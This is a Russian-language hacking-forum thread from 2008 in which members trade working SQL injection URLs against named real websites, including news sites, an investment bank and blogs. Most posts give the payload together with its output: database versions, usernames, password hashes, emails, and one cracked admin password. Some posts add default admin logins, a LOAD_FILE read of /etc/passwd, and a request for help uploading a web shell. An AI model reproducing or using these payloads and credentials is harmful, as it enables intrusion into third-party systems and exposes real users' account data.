HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.01.2008, 02:53
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

versii.com.ua
Код:
http://versii.com.ua/telegraf/print.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/*
5.0.45-log:versii@localhost:versii

Админка:
Код:
http://versii.com.ua/admin/
 
Ответить с цитированием

  #2  
Старый 03.01.2008, 03:00
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
С нами: 10522103

Репутация: 272
По умолчанию

http://www.trinidadexpress.com/index.pl/article_news?id=161245965+UNION+SELECT+1,version() ,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32

4.0.27-standard-log
csite01@AdServNode1


непонятная админка:

http://admin.trinidadexpress.com/
логин:пароль
carlos:carlos
 
Ответить с цитированием

  #3  
Старый 03.01.2008, 03:18
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

MySQL Injection:
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5, 6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABA SE()),15,16+FROM+mysql.user/*
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13, 14,15,16/*
http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/*
БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах .

MsSQL Injection:

http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #4  
Старый 03.01.2008, 03:45
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами: 9865044

Репутация: 205
По умолчанию

www.big6.com

Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5/*
5.0.37-log:big6@localhost:big6

Интересные таблицы:
wp_users
poll_user
customers
blog_users


Т.к. сейчас слишком поздно, какие из них фальшивые разбираться не стал:
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email),2,3,4,5+FROM+wp_users+LIMIT+1,1/*
2:sue:e7e9ec3723447a642f762b2b6a15cfd7:sue_wurster @big6.com::bella
...
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(user_id,0x3a,username,0x3a,userpass),2,3,4,5+FROM+poll_user/*
1:admin:d158b1d234953b66bfc119f17f800b7b::big6php
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(customers_id,0x3a,customers_email_address,0x3a,customers_password),2,3,4,5+FROM+customers/*
1:root@localhost:d95e8fa7f20a009372eb3477473fcd34: 1c::1cpassword

P.S. С blog_users все то же самое, что и с wp_users =)

Последний раз редактировалось ~EviL~; 03.01.2008 в 03:48..
 
Ответить с цитированием

  #5  
Старый 03.01.2008, 08:28
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

http://www.nram.org.nz/

Код:
http://www.nram.org.nz/record.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+USERS+limit+0,1/*
 
Ответить с цитированием

  #6  
Старый 03.01.2008, 09:05
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию

Код:
http://www.blogi.moje.pl/kategor.php?id_kategori=-1+union+select+1,VERSION(),3,4,5,6,7/*
Код:
http://tibiacz.com/kategorie_predmet.php?kat=-1+union+select+1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11+from+information_schema.columns/*
Код:
http://www.cytaty.pl/wyslij.php?numer=0+union+select+1,VERSION(),3,4,5,6/*
Код:
http://opisygg.szabloniki.com/index.php?pokaz_opis=-3871+union+select+1,VERSION(),3,4,5,6/*
Код:
http://www.ggopis.info/opis.php?id=0+UNION+SELECT+1,2,3,4,5,6,7/*
Код:
http://www.foto.oaza.pl/pokaz.php?strona=1&id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*

Последний раз редактировалось SWAT; 03.01.2008 в 09:46..
 
Ответить с цитированием

  #7  
Старый 03.01.2008, 12:40
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

moblog.co.uk

Цитата:
http://moblog.co.uk/rss.php?id=-11206+union+select+1,2,concat_ws(0x3a3a,userlevel, username,password,email),4,5+from+mob_users/*
Скрипт блога тоже бажный...
 
Ответить с цитированием

  #8  
Старый 03.01.2008, 17:31
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

http://www.rabota-enisey.ru/news/?article=-1+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '

http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+db_name())-- rabota-enisey.ru
http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+system_user)-- rabota-enisey_ru

-----------------------------------------------------------------------------

invest.trust.ru Инвестиционный банк «ТРАСТ»


http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.0.22/trust_rus/trust_bank@localhost


http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,users_login,users_ password,users_Email),3,4,5,6,7,8,9+from+site_user s+limit+0,1/*

логин/хеш/мейл
root/e6b764d1ce8aec819b8aeebb2c4f45db/

Юзаем ANTICHAT ONLINE MD5 CRACK (http://md5.xek.cc/ ) получаем:

e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76

 
Ответить с цитированием

  #9  
Старый 03.01.2008, 21:29
sharoff
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами: 9876886

Репутация: 18
По умолчанию

Цитата:
Сообщение от ElteRUS  
invest.trust.ru Инвестиционный банк «ТРАСТ»

...

e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76

админка
Цитата:
http://www.invest.trust.ru/_admin/
Шелл залить не удалось, кому удастся напишите в асю.
 
Ответить с цитированием

  #10  
Старый 03.01.2008, 17:53
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию

Код:
http://www.ptgem.pl/pokaz.php?idz=-9+union+select+1,2,3,VERSION(),5,6,7/*
Код:
http://www.foto-akcesoria.com.pl/index.php?i=produkt&nr=-9+union+select+VERSION(),2,3/*
Код:
http://www.emmanuel.home.pl/index.php?lang=uk&url2=art&info=-999+union+select+1,2,3,version(),5,6,7/*

Последний раз редактировалось SWAT; 03.01.2008 в 18:05..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.